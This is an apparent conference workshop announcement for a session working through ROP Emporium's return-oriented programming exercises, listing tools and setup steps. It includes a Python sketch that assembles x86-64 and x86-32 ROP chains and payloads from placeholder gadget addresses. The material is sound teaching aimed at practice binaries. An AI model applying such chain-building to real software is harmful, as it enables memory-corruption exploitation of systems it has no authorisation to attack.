PTS2025

ROPemporium party
2025-07-02, 09:15–12:15 (Europe/Paris), Room LW109

ROP (Return-Oriented Programming) is an essential technique for exploiting modern binary executables. The ROPEmporium website (https://ropemporium.com/), developed by Max Kemper, features a series of step-by-step exercises designed to help you discover the technique progressively.

The workshop offers a shared experience of these exercises.

During this workshop, we'll work together to solve some of the exercises on the site.

The aim is to give you enough theoretical and practical knowledge to be able to extend the experience by doing all the exercises proposed afterwards.
The site offers exercises on Intel x86-64, x86-32, ARM and MIPS executables.

After a presentation of the platform and the main concepts involved in ROP, you'll be able to learn from the exercises:

  • Get to grips with the tools to discover an initial function calling technique.
  • Call a function with a parameter already present in the executable.
  • Master the convention of passing parameters for more complex calls.
  • Learn how to place some data in memory and pass it as a parameter.
  • Search for usable gadgets when the most obvious are not available.
  • Finally, we'll create a slightly more complex ROP chain using a pivot technique.
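As an added illustration of the parameter-passing conventions the second and third items above contrast (this is not code from the workshop or from ROP Emporium), the following Python lays out a single-call chain for x86-64 and for x86-32 and checks the payload for input-terminating bytes; every address is a constructed placeholder standing in for what ropper or ROPGadget would report on a real challenge binary:

```python
import struct

# Constructed, hypothetical addresses; nothing here refers to a real binary.
GADGETS_X64 = {
    "pop rdi; ret": 0x400733,
    "pop rsi; pop r15; ret": 0x400731,   # r15 receives a throwaway value
    "pop rdx; ret": 0x400745,
}
FUNC_X64 = 0x400610
FUNC_X86 = 0x08048430
POP3_RET_X86 = 0x080486E3  # "pop ebx; pop esi; pop edi; ret": discards up to 3 args

def chain_x64(func, args):
    """System V AMD64: the first three integer arguments travel in rdi, rsi
    and rdx, so each one needs a pop gadget *before* the call lands."""
    order = [("pop rdi; ret", 0), ("pop rsi; pop r15; ret", 1), ("pop rdx; ret", 0)]
    if len(args) > len(order):
        raise ValueError("only %d register gadgets modelled" % len(order))
    words = []
    for value, (gadget, extra_pops) in zip(args, order):
        words += [GADGETS_X64[gadget], value] + [0] * extra_pops
    words.append(func)
    return b"".join(struct.pack("<Q", w) for w in words)

def chain_x86(func, args):
    """cdecl on x86-32: arguments are read from the stack above the return
    address, so the layout is func, return-address-after-func, arg1, arg2...
    Using a pop-pop-pop-ret gadget as that return address discards the
    arguments, which is what allows a further call to follow."""
    words = [func, POP3_RET_X86] + list(args)
    return b"".join(struct.pack("<I", w) for w in words)

def build_payload(chain, offset, bad=b"\n"):
    """Prefix the filler needed to reach the saved return address, then refuse
    chains containing bytes the input routine (e.g. fgets) would stop on."""
    payload = b"A" * offset + chain
    hit = [b for b in bad if b in payload]   # iterating bytes yields ints
    if hit:
        raise ValueError("chain contains bad byte(s): %r" % bytes(hit))
    return payload
```

The 64-bit chain for a three-argument call is eight 8-byte words (three pop gadgets, three values, one junk word for r15, the function), whereas the 32-bit chain needs no gadget before the call at all.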

As an epilogue, if time permits, we'll take a look at ARM binary exploitation with qemu, to encourage you to extend the experience.

The workshop is ideally aimed at people familiar with x86 assembler and the basics of buffer-overflow exploitation.

To carry out the exercises you will need a Linux machine with the following open-source tools:
- gdb
- a gdb extension such as GEF or pwndbg
- python3
- pwntools
- radare2
- ropper or ROPGadget
and optionally:
- 32-bit libraries (libc6-i386)
- qemu

A docker image containing the required tools will be made available and its use encouraged.
Docker is therefore the main prerequisite.

By the way, to avoid clogging up the network and to save time at the beginning of the workshop, please try to download the materials in advance:

    git clone https://github.com/cdpointpoint/ropemporium_party.git
    cd ropemporium_party
    ./run_ptsrew.sh

The run script will pull the 2 GB Docker image the first time it is run.

It is also possible to follow the workshop without carrying out (all) the hands-on steps during the session, and instead keep the focus on the explanations and exchanges.

Computer engineer since 1985 and security "expert" since around 1995 mainly for the CNAM (Caisse Nationale d'Assurance Maladie) institution.
Unfortunately, recently retired.